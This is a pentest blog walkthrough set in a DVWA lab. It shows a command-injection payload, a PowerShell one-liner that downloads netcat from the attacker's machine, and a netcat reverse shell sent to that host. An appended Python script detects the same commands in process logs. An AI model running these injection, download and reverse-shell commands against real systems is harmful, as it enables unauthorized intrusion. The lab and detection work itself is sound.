Wednesday, March 6, 2013

Retrieving Elusive Command Output

I have found myself on multiple pentests recently where I needed to retrieve (blind) command output from a remote machine. Blind remote command execution by itself is great, and you can do many evil things to a machine without even having to view the output, but usually at some point during the attack lifecycle you will need to view command output (for example, data exfiltration or a shell upgrade). This post will assume the following things:

- Blind remote command execution has been verified (via ICMP or some other method)
- You are attacking a web application
- You are attacking a Windows host
- You wish to use native Window$ programs so you don't have to upload anything (more noise)

The most common way to retrieve blind command output would be through FTP. This method works great, but for the sake of learning multiple ways to accomplish this, I wanted a second way to view the command output. Our goal will be to upgrade to an interactive command prompt, allowing us to view command output.

Here is the setup:

Victim Machine: Win7 running DVWA (192.168.1.101)
Attacker Machine: Backtrack (192.168.1.107)

For this post, we will use the command execution vulnerability within DVWA as our initial "blind" command execution. I realize DVWA by default spits the cmd output back to you, but you can edit the PHP source code (and learn some more in the process) to make this a truly blind attack.

We will use the following payload to exploit the vulnerability:

127.0.0.1 | whoami

Now that we have established blind command execution, we need to use another tool native to Windows to grab a file for us. When it comes to Windows I do most things with PowerShell, and have found a renewed love for it thanks to the awesome work from @mattifestation and @obscuresec with the PowerSploit project. Thus I wanted to use it to accomplish my goals. I needed a one-line PowerShell command that would work similarly to wget on Linux. After some research, I came across this blog post that gave me what I needed. It goes something like this:

(new-object System.Net.WebClient).Downloadfile("http://attacker.com/test.txt", "test.txt")

This command creates a new COM object for the System.Net.WebClient class and then uses the DownloadFile method, passing it two parameters:
1) The location and name of the file you want to download
2) The location and name under which to save it on the local machine

Once I confirmed this command would reach out to my server, I put a netcat binary into the webserver root. 

Using this command (after modifying the quotes) and invoking the powershell.exe binary, I was able to pull netcat from my machine. The full command to the web application resulted in this:

127.0.0.1 | powershell.exe (new-object System.Net.WebClient).Downloadfile('http://192.168.1.107/nc.exe', 'nc.exe')



Then, once the command completed, I set up a netcat listener on my attacker machine and issued a second command to the web application to push a shell back to my attacker machine via netcat:

127.0.0.1 | nc.exe -e cmd.exe 192.168.1.107 21


In this post we used PowerShell to go from blind/1-way command execution to an interactive Windows shell, allowing us to retrieve command output.
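Seen from the defender's side, each of the three commands above leaves a process-creation record on the Windows host. The following is an added example, not code from the original post: a small Python triage pass over events shaped like Sysmon Event ID 1 (fields ParentImage, Image, CommandLine). The sample events are constructed, and the web-server process names and file paths are assumptions.

```python
import re

# Assumption: names of web-server worker processes; adjust to the stack in use.
WEB_PARENTS = {"httpd.exe", "php-cgi.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Command-line patterns taken from the two commands shown in the post.
RULES = [
    ("webclient_download", re.compile(r"net\.webclient.*\.downloadfile\s*\(", re.I)),
    ("shell_bound_to_socket", re.compile(r"\s-e\s+(cmd|powershell)(\.exe)?\b", re.I)),
]

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    if basename(event["ParentImage"]) in WEB_PARENTS and basename(event["Image"]) in SHELLS:
        hits.append("web_server_spawned_shell")
    hits += [name for name, rx in RULES if rx.search(event["CommandLine"])]
    return hits

def scan(events):
    """Keep only the events that triggered at least one rule."""
    flagged = []
    for event in events:
        hits = triage(event)
        if hits:
            flagged.append((event["CommandLine"], hits))
    return flagged

# Constructed sample events (not real logs); paths are illustrative.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\xampp\apache\bin\httpd.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c "ping 127.0.0.1 | whoami"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe (new-object System.Net.WebClient)"
                    ".Downloadfile('http://192.168.1.107/nc.exe', 'nc.exe')"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\xampp\htdocs\nc.exe",
     "CommandLine": "nc.exe -e cmd.exe 192.168.1.107 21"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
]

if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", cmdline)
```

The parent/child rule fires regardless of what the injected command is, which makes it the most durable of the three; the two command-line patterns only match the specific strings used in this post.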

If you know of other ways to retrieve blind command execution output using native Windows tools, please feel free to discuss in the comments.